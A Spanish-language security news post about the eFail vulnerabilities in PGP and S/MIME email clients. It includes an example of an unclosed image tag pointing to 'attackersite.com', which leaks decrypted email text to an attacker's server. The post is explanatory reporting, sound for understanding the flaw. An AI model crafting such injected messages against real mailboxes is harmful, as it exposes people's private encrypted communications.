EFail Ataca PGP y correos electrónicos encriptados S/MIME



PGP y S/MIME son estándares populares de encriptación de extremo a extremo utilizados para encriptar correos electrónicos de una manera que nadie, ni siquiera la compañía, el gobierno o los ciberdelincuentes, pueden espiar su comunicación.

Debemos tener en cuenta que la falla no reside en los estándares de cifrado del correo electrónico.

Apodados eFail por los investigadores, las vulnerabilidades, podrían permitir que los atacantes descifren el contenido de sus correos electrónicos cifrados de extremo a extremo en texto sin formato, incluso para los mensajes enviados en el pasado.

las vulnerabilidades existen en la forma en que los clientes de correo cifrado manejan correos electrónicos HTML y recursos externos, como la carga de imágenes, estilos de URL externas.

Los clientes de correo electrónico suelen estar configurados para descifrar automáticamente el contenido de los correos electrónicos cifrados que usted recibe, pero si su cliente también está configurado para cargar recursos externos automáticamente, los atacantes pueden abusar de este comportamiento para robar mensajes en texto simple.

El vector de ataque requiere texto plano inyectado en el correo encriptado, y luego usando el exploit, se filtrarán los datos originalmente encriptados tan pronto como el cliente de correo del destinatario acceda (o descifre) el mensaje.

Cabe señalar que para realizar un ataque de eFail, un atacante debe tener acceso a sus correos electrónicos encriptados, que luego se modifican y se envían de vuelta para engañar a su cliente de correo electrónico y revelarle el mensaje secreto al atacante remoto. sin avisarte.
En el correo electrónico recientemente compuesto, el atacante agrega una etiqueta de imagen no cerrada, como esta "imgsrc= "https ://attackersite.com/ justo antes del contenido encriptado y lo finaliza a gregando el final de la etiqueta de imagen, como este: “jpg ".

Cuando su cliente de correo electrónico vulnerable recibe este mensaje, descifra la parte encriptada del mensaje dado en el medio, y luego automáticamente intenta mostrar el contenido HTML, es decir, la etiqueta de la imagen con todo el texto descifrado como el nuevo nombre de la imagen

Como su cliente de correo electrónico intentará cargar la imagen desde el servidor controlado por el atacante, el atacante puede capturar esta solicitud entrante, donde el nombre de archivo contiene el contenido completo del correo electrónico encriptado original en texto sin formato.

Los investigadores también aconsejan a los usuarios que adopten un algoritmo de cifrado autenticado para la comunicación confidencial.


Fuente: The Hacker News 
Nombre

Actualización,5,Actualizaciones,4,AD,1,Adobe,3,Adware,4,AgentTesla,1,android,34,Antivirus,3,Apache,1,APP,1,Apple,17,Apps,14,APT,2,Arkavia Networks,16,asus,1,Ataques,8,Azure,3,Backdoor,5,Bancos,6,Barracuda,1,Bases de Datos,7,BCE,1,Bluetooth,1,bootHole,1,Botnet,8,Botnet. Malware,1,BYOVD,1,Check Point,5,Chile,3,Chips,1,Chrome,3,Ciberataque,9,Cibercrimen,156,Cibercriminales,4,Ciberdelincuencia,17,ciberseguridad,180,Cisco,4,Citrix,6,Cloud,3,Cloudflare,1,CMS,1,ComRAT,1,Comunicaciones,1,conexión,2,Consejos,2,CONVID,1,CookieThief,1,Coronavirus,1,Corporation,1,COVID19,2,CPU,3,Criptomineria,1,Criptomonedas,7,CSP,1,CTF,1,CVE,2,cyber day,2,Cyberwarfare,5,Dark Web,3,Data Breach,3,Data Leak,14,Database,3,DataLeak,2,Datos,2,DDoS,6,Debate,1,Deep Web,5,dispositivos,1,dlink,1,DNS,2,Domains,1,DoS,5,Dropper,1,Ecommerce,3,elasticsearch,1,Email,5,Emotet,3,Empresas,116,endpoint,1,enrutadores,1,Estadisticas,1,estado,1,evento,1,Eventos,6,Evilnum,1,Exchange,5,exploit,9,Exploits,15,Extensiones,2,Extensions,2,F5 Networks,1,Facebook,9,Falla,3,Fileless,1,Fintech,1,FireEye,2,Firewall,1,Firmware,2,Flash,2,Fortinet,1,Framework,1,FreakOut,1,Freta,1,GARMIN,2,Git,1,GitHub,1,Glueball,1,Gmail,3,gobierno,1,GoDaddy,1,google,35,Gootkit,1,GPS,2,GRUB2,1,grupoatp,1,Hacking,85,HALLOWEEN,1,Hardware,7,Hosting,3,HTML5,1,HTTP,2,IBM,1,IGMP,1,Industria,10,Infostealer,3,Instagram,2,Intel,2,Internacional,40,Internet,36,Investigacion,9,IOC,7,ios,6,IoT,4,ipad,1,iphone,1,ISO,1,Javascript,1,Joomla,1,LATAM,1,Latinoamerica,1,lazarus,1,LG,1,Linux,10,LoLbins,1,LSASS,1,macOS,1,Macromedia,1,malicioso,1,Malware,57,Malwares,32,Maze,2,MDM,1,memento,1,Messenger,1,MFA,1,Microsoft,41,Mirai,2,Monero,1,mongoDB,1,MSP,1,MSSQL,1,Mukashi,1,musica,1,Nacional,10,NAS,2,navidad,1,Nefilim,1,Negocios,2,Netgear,1,Netwalker,1,Node.js,1,Nube,1,Openwrt,1,Oracle,3,OS,9,Passwordless,1,Payload,2,Paypal,1,phishing,20,PHP,1,Plugins,1,PoC,2,prevención,1,Protocolos,12,ProxyLogon,1,Python,2,QNAP,1,QR,1,Ragnar_Locker,1,Ransomware,26,RAT,2,RCE,3,RDoS,1,RDP,4,Recomendaciones,21,Redes,31,redes sociales,12,Redhat,1,regalo,1,RegretLocker,1,Remoto,1,REvil,1,Rookit,1,Rootkit,2,Routers,3,RRSS,2,Ryuk,1,Saintbot,1,Salt,1,Salud,3,SAP,1,SeguridadTI,4,Servicios,8,Smartphones,30,SMB,5,Sodinokibi,1,Software,24,solarwinds,1,SonicOS,1,Sonicwall,1,Sophos,1,Spambot,1,Spamhaus,1,spotify,1,Spyware,11,SQL,1,SSL,1,streaming,1,Takedown,1,Teams,1,TeamViewer,1,tendencia,2,TerraMasterOS,1,Tool,1,Tools,2,TOS,1,Tplink,1,Trickbot,1,Trojan,4,Troyano,6,último,1,Update,6,updates,22,USB,1,Videoconferencia,1,VM,1,vmware,1,VNC,1,VPN,6,Vulnerabilidad,42,Vulnerabilidades,81,Web,8,WER,1,WhatsApp,7,Whirlpool,1,wifi,5,Windows,24,Winrar,1,Wordpress,4,Worm,2,Xerox,1,XG,1,Yahoo,1,Zeroclick,1,zeroday,4,Zerologon,1,Zoom,3,Zoombombing,1,
ltr
item
Arkavia Networks News: EFail Ataca PGP y correos electrónicos encriptados S/MIME
EFail Ataca PGP y correos electrónicos encriptados S/MIME
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfsIXq3KKPx-fwermhHujwMjXHYxYxCks5nJbIwIBkJJdPpPnOp_Y2DrMjnA0MZRd60gy-lwQSbupSKdZA_mVfnNbDkhMAbRJQgA2wsfQGl1agqD2dBBOVLHihomPVXtAV8EhLwW3gJXE/s640/IMG80.png
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfsIXq3KKPx-fwermhHujwMjXHYxYxCks5nJbIwIBkJJdPpPnOp_Y2DrMjnA0MZRd60gy-lwQSbupSKdZA_mVfnNbDkhMAbRJQgA2wsfQGl1agqD2dBBOVLHihomPVXtAV8EhLwW3gJXE/s72-c/IMG80.png
Arkavia Networks News
https://www.arkalabs.cl/2018/05/efail-ataca-pgp-y-correos-electronicos.html
https://www.arkalabs.cl/
https://www.arkalabs.cl/
https://www.arkalabs.cl/2018/05/efail-ataca-pgp-y-correos-electronicos.html
true
7213111567211435179
UTF-8
Se han cargado todas las publicaciones No se ha encontrado ninguna publicación. Ver Todos Leer Noticia Responder Cancelar Respuesta Eliminar Por Inicio PÁGINAS ENTRADAS View All RECOMENDADO PARA TI ETIQUETA ARCHIVOS BUSQUEDA TODAS LAS ENTRADAS No se ha encontrado ninguna coincidencia de publicación con su solicitud. Volver al Inicio Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share. STEP 2: Click the link you shared to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy